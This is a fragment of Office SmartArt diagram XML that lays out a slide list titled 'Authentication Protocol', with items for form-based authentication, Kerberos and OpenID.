    <dgm:cxn modelId="{D4F5CF71-CB11-48A1-80A0-76B18A100BFF}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0E3DA828-5645-4C13-9DCC-5276C71D8FF2}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{57A1CDEF-8415-41B5-BEA6-75BFA2C71DEB}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C2AA89A6-0E8A-4D54-96FB-D13CCA071972}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3A36EEE5-8BDE-4158-AF91-62384C2961DC}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{99464564-B6A2-42F2-BC03-417FD03C66D8}" type="presParOf" srcId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" destId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{81D96A7A-D414-4356-B381-DE0DE36F76AA}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{239F5A54-79A0-4C87-937C-EE42B2964555}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{879BAB2F-62F9-4BA8-8B27-AFABE3985895}" type="presParOf" srcId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" destId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D54398CB-C00F-4D72-8FC3-0AD694EE4200}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9C2EAF49-E321-4C5D-BD97-174DA3180A0C}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3052718C-AF61-4EB7-87EF-3C94A0EC137C}" type="presParOf" srcId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" destId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{5F726A34-7154-4597-A450-B8575A9D07F2}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{70DAA8A7-7676-41BA-88B5-2ED6FE864CCA}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3A937161-22F9-4F5F-B0A6-53D5F9B33CF0}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{E11B724C-D087-4C6F-99A4-78661B1DEC6E}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{318C7867-3D5F-4C0C-B3B2-4EC55D122E64}" type="presParOf" srcId="{E11B724C-D087-4C6F-99A4-78661B1DEC6E}" destId="{8F5CCB78-D749-4F80-8312-407E61B052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A4D026-7E7A-4C3D-B0A6-713401C65A2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DD2881F-2CD8-4774-B505-63EEE0D690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Authentication Protocol</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF4E8C81-BDD3-4516-8B59-BDC31D4BC3FC}" type="sibTrans" cxnId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C97BEFE8-C449-4040-98B9-46C86CED5719}" type="parTrans" cxnId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11FB30F7-4ABC-4C05-8747-F8FFE30C5DA0}" type="pres">
      <dgm:prSet presAssocID="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{928AA48F-C0D2-463C-9C60-0883B0A7ACD5}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="iconBgRect" presStyleLbl="bgShp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7BC38118-436A-4C8D-BBD8-1ECBF6D41F1E}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8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58EEA86-FF86-4637-B984-6C2F27B12B87}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A79ED347-A0EA-402A-B1CC-DA827E7BC03B}" type="pres">
      <dgm:prSet presAssocID="{EDD2881F-2CD8-4774-B505-63EEE0D690A8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D169E82D-EB98-4A00-BF47-74035BE0CEE4}" type="presOf" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{11FB30F7-4ABC-4C05-8747-F8FFE30C5DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9E4C9448-746C-4694-9CB9-678FA1BFD45F}" type="presOf" srcId="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" destId="{A79ED347-A0EA-402A-B1CC-DA827E7BC03B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{832596BA-32AF-4507-A5C7-C3031CA3DFC0}" srcId="{90A4D026-7E7A-4C3D-B0A6-713401C65A22}" destId="{EDD2881F-2CD8-4774-B505-63EEE0D690A8}" srcOrd="0" destOrd="0" parTransId="{C97BEFE8-C449-4040-98B9-46C86CED5719}" sibTransId="{BF4E8C81-BDD3-4516-8B59-BDC31D4BC3FC}"/>
    <dgm:cxn modelId="{4324135B-6706-41A6-8631-44A16BE10F7C}" type="presParOf" srcId="{11FB30F7-4ABC-4C05-8747-F8FFE30C5DA0}" destId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C457E125-4296-4734-B00A-AEFAA99B3163}" type="presParOf" srcId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" destId="{928AA48F-C0D2-463C-9C60-0883B0A7ACD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{1B313922-93CD-42DF-AF15-92699CC0B1E5}" type="presParOf" srcId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" destId="{7BC38118-436A-4C8D-BBD8-1ECBF6D41F1E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{CCF9C94A-EF65-4C61-A10B-8FA00903E38D}" type="presParOf" srcId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" destId="{058EEA86-FF86-4637-B984-6C2F27B12B87}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DCD2C02B-A9E3-446F-8827-D8D0D787C244}" type="presParOf" srcId="{AFEA0D73-5EE5-42D4-A122-4EE580F52317}" destId="{A79ED347-A0EA-402A-B1CC-DA827E7BC0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CF31DA-4F8E-4158-BD57-980AD0B295D1}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurv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E0A022E-F501-4D6A-B7F8-EEC24211088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Form based</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" type="parTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{067A5571-4130-4BA7-B061-824B4495CC44}" type="sibTrans" cxnId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A119B9F-DF0C-47BB-B2A5-7AD9B020892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Kerberos</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" type="parTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{867069EF-CB44-4707-913B-47915FE8DA7D}" type="sibTrans" cxnId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF28327A-6ACE-4196-8AE3-021E145010A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OpenID</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" type="parTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}" type="sibTrans" cxnId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B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…</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25321BBC-B1E0-4975-9E57-7EAEA0443B9E}" type="parTrans" cxnId="{971AC016-D3A7-4010-8325-DCF389BBC536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90921925-DADC-4A00-850A-5F66AC68047A}" type="sibTrans" cxnId="{971AC016-D3A7-4010-8325-DCF389BBC536}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" type="pres">
      <dgm:prSet presAssocID="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" type="pres">
      <dgm:prSet presAssocID="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" type="pres">
      <dgm:prSet presAssocID="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" type="pres">
      <dgm:prSet presAssocID="{CF28327A-6ACE-4196-8AE3-021E145010A4}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="text_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="accent_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{792F66F8-49DF-49C4-A2C8-AC432EDDED38}" type="pres">
      <dgm:prSet presAssocID="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{971AC016-D3A7-4010-8325-DCF389BBC536}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" srcOrd="3" destOrd="0" parTransId="{25321BBC-B1E0-4975-9E57-7EAEA0443B9E}" sibTransId="{90921925-DADC-4A00-850A-5F66AC68047A}"/>
    <dgm:cxn modelId="{9CF97C38-B07A-4C5A-A319-37B425DB70B6}" type="presOf" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{24646A5D-3F16-4058-85FD-A63CE0A7C22E}" type="presOf" srcId="{067A5571-4130-4BA7-B061-824B4495CC44}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{253F2F7F-0759-4AB0-93D3-2082B93777AC}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" srcOrd="2" destOrd="0" parTransId="{054304F5-792B-43C1-9A1C-CD3738E01A37}" sibTransId="{331B79E0-CCDC-4F80-9E64-196A1C9A1FB7}"/>
    <dgm:cxn modelId="{D01F2288-571C-4EF7-BFDD-E2F0F92E2EEC}" type="presOf" srcId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3816EB92-F560-44EF-AC8B-A6F931E628A3}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" srcOrd="0" destOrd="0" parTransId="{05447DF4-13E6-41CA-8376-111805CF6B1B}" sibTransId="{067A5571-4130-4BA7-B061-824B4495CC44}"/>
    <dgm:cxn modelId="{28A482A6-D408-4069-983D-8A983C7F57C3}" type="presOf" srcId="{AE0A022E-F501-4D6A-B7F8-EEC24211088A}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{74A69CBD-6EDA-4066-9FFF-B08ADD9FC5E2}" srcId="{85CF31DA-4F8E-4158-BD57-980AD0B295D1}" destId="{1A119B9F-DF0C-47BB-B2A5-7AD9B0208926}" srcOrd="1" destOrd="0" parTransId="{77FFDF12-22E2-4221-BBB5-60CD46104CD8}" sibTransId="{867069EF-CB44-4707-913B-47915FE8DA7D}"/>
    <dgm:cxn modelId="{D0830EE8-98C6-4A60-9B47-17875144EB0C}" type="presOf" srcId="{AA91519F-5B62-44E3-9FBA-88880FCEB0B6}" destId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F806EAF7-5978-4880-9BAA-41090E2C7E41}" type="presOf" srcId="{CF28327A-6ACE-4196-8AE3-021E145010A4}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{72702396-5385-40FC-91C5-A487FBF98250}" type="presParOf" srcId="{ED3A9C8E-1AD8-4500-A6B7-D52AF893A4D8}" destId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{23D55643-6371-4111-8CF4-4ECFCEDA808E}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{B614338A-5084-4451-A503-6F455F7A9B74}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{E7EC2769-A2BA-4F11-875A-D1A7149F2AC2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D4F5CF71-CB11-48A1-80A0-76B18A100BFF}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{235A759C-FF99-46A0-B7B2-9BA78096698A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0E3DA828-5645-4C13-9DCC-5276C71D8FF2}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{280FC3BE-935D-4F5F-896B-F73344EF1531}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{57A1CDEF-8415-41B5-BEA6-75BFA2C71DEB}" type="presParOf" srcId="{2BD7D5AD-22DF-4393-869F-1247A6AF1DF8}" destId="{3C48355B-3174-46B3-A1F1-80C3E7BCDBD9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C2AA89A6-0E8A-4D54-96FB-D13CCA071972}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{A87BAE4B-8178-46A0-97C0-DA467EE38F19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3A36EEE5-8BDE-4158-AF91-62384C2961DC}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{99464564-B6A2-42F2-BC03-417FD03C66D8}" type="presParOf" srcId="{70E988FA-2FDD-42B0-B69D-774BF113A4E2}" destId="{B69DCF54-2D9D-4535-9929-670416E84C0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{81D96A7A-D414-4356-B381-DE0DE36F76AA}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{5952D4BF-A371-43F1-BD47-FA648C912FD1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{239F5A54-79A0-4C87-937C-EE42B2964555}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{879BAB2F-62F9-4BA8-8B27-AFABE3985895}" type="presParOf" srcId="{398F3DFF-9018-4516-B4CF-E50479A8A558}" destId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D54398CB-C00F-4D72-8FC3-0AD694EE4200}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{857F507D-12BB-42FA-A84E-AE57235F61F1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9C2EAF49-E321-4C5D-BD97-174DA3180A0C}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{3052718C-AF61-4EB7-87EF-3C94A0EC137C}" type="presParOf" srcId="{4A90D28B-1D3F-4D78-8726-F754FEB6ACCD}" destId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9FCCB9F5-5963-42CD-95D9-22825B374B57}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{F0097499-02B0-4D57-BAD1-CC21EF7072FC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{A17FD5DF-85B1-4AFB-B5D0-E8C67C801871}" type="presParOf" srcId="{6F3F0205-0C5B-48A2-AD0F-420DCD2AC676}" destId="{707A78A9-7121-4E3B-AA51-461A5AD8B33B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
